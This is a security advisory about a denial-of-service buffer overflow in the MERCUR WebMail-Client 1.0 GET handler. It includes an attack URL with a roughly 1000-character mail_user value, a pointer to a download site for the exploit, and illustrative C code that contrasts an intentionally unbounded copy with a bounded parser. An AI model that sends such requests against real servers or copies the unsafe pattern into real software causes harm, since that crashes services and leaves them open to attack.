COMMAND
MERCUR WebMail-Client
SYSTEMS AFFECTED
MERCUR WebMail-Client Version 1.0 (TCP port 1080)
PROBLEM
UssrLabs found a buffer overflow in the MERCUR WebView WebMail-Client
1.0: the code that handles GET requests does not perform proper bounds
checking on the parameter values it copies. The following request
results in a Denial of Service against the WebMail service. Example:
http://hostip:1080/mmain.html&mail_user=(buffer)
where (buffer) is approximately 1000 characters. Binary or source for
this exploit:
http://www.ussrback.com/
The exploit crashes the remote machine's WebMail service. It was
distributed as the MIME attachment below:
---
Content-Type: application/octet-stream; name="domrc10w.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="domrc10w.zip"
Content-MD5: m4sBp9jwTdlcppefp+y9Vg==
-----
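The flaw class described above is an unbounded copy of a GET parameter into a fixed-size buffer. The following C code is an added example written for this page, not MERCUR's source or the UssrLabs exploit: it shows the vulnerable pattern next to a bounded parser of the same `mail_user` parameter, and builds a request path in the shape of the advisory's URL with a 1000-byte value. The buffer size USER_MAX, the function names and the sample request strings are assumptions for illustration; the real MERCUR field size is not known from the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the server-side buffer holding mail_user; the real
 * MERCUR value is not stated in the advisory. */
#define USER_MAX 64

/* Vulnerable pattern (constructed for contrast, not MERCUR's code): the
 * length of the GET parameter value is never compared against the stack
 * buffer it is copied into, so a ~1000-byte value overruns `user` and
 * smashes the stack. Calling this with a long value is undefined
 * behaviour, which is what the advisory's URL triggers on the server. */
static int get_mail_user_unsafe(const char *path, char *out, size_t outsz)
{
    char user[USER_MAX];
    const char *p = strstr(path, "mail_user=");
    if (p == NULL)
        return -1;
    p += strlen("mail_user=");
    size_t n = strcspn(p, "&");      /* value runs to the next '&' or end */
    memcpy(user, p, n);              /* no check: n >= USER_MAX overflows */
    user[n] = '\0';
    snprintf(out, outsz, "%s", user);
    return 0;
}

/* Bounded version: same parse, but the value length is checked against
 * the destination before any byte is copied. Returns 0 on success, -1 if
 * the parameter is absent, -2 if the value would not fit (the request
 * should then be refused, e.g. with 400 or 414, never copied). */
static int get_mail_user_safe(const char *path, char *out, size_t outsz)
{
    const char *p = path;
    /* Accept mail_user= only as a parameter name (after '?' or '&'),
     * not as the tail of another name such as xmail_user=. */
    for (;;) {
        p = strstr(p, "mail_user=");
        if (p == NULL)
            return -1;
        if (p > path && (p[-1] == '?' || p[-1] == '&'))
            break;
        p += 1;
    }
    p += strlen("mail_user=");
    size_t n = strcspn(p, "&");
    if (n >= outsz)                  /* leave room for the terminator */
        return -2;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Build a request path in the shape the advisory gives
 * (/mmain.html&mail_user=...) with a value of `len` 'A' bytes.
 * Constructed test input; caller frees. */
static char *make_probe_path(size_t len)
{
    const char *prefix = "/mmain.html&mail_user=";
    size_t plen = strlen(prefix);
    char *path = malloc(plen + len + 1);
    if (path == NULL)
        return NULL;
    memcpy(path, prefix, plen);
    memset(path + plen, 'A', len);
    path[plen + len] = '\0';
    return path;
}

int main(void)
{
    char user[USER_MAX];
    char *probe = make_probe_path(1000);
    if (probe == NULL)
        return 1;

    /* The bounded parser refuses the advisory-sized value before copying. */
    int rc = get_mail_user_safe(probe, user, sizeof user);
    printf("1000-byte mail_user: rc=%d (%s)\n", rc,
           rc == -2 ? "rejected before copy" : "accepted");

    /* Both parsers behave identically on a short, well-formed value. */
    rc = get_mail_user_safe("/mmain.html?mail_user=alice&folder=inbox",
                            user, sizeof user);
    printf("bounded parser: rc=%d user=%s\n", rc, user);
    rc = get_mail_user_unsafe("/mmain.html?mail_user=alice&folder=inbox",
                              user, sizeof user);
    printf("unsafe parser (short value only): rc=%d user=%s\n", rc, user);

    free(probe);
    return 0;
}
```

The difference between the two parsers is a single comparison of the parsed length against the destination size; the unsafe variant is the one whose behaviour matches the crash the advisory reports, and it is called here only with a short value.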
SOLUTION
Nothing yet.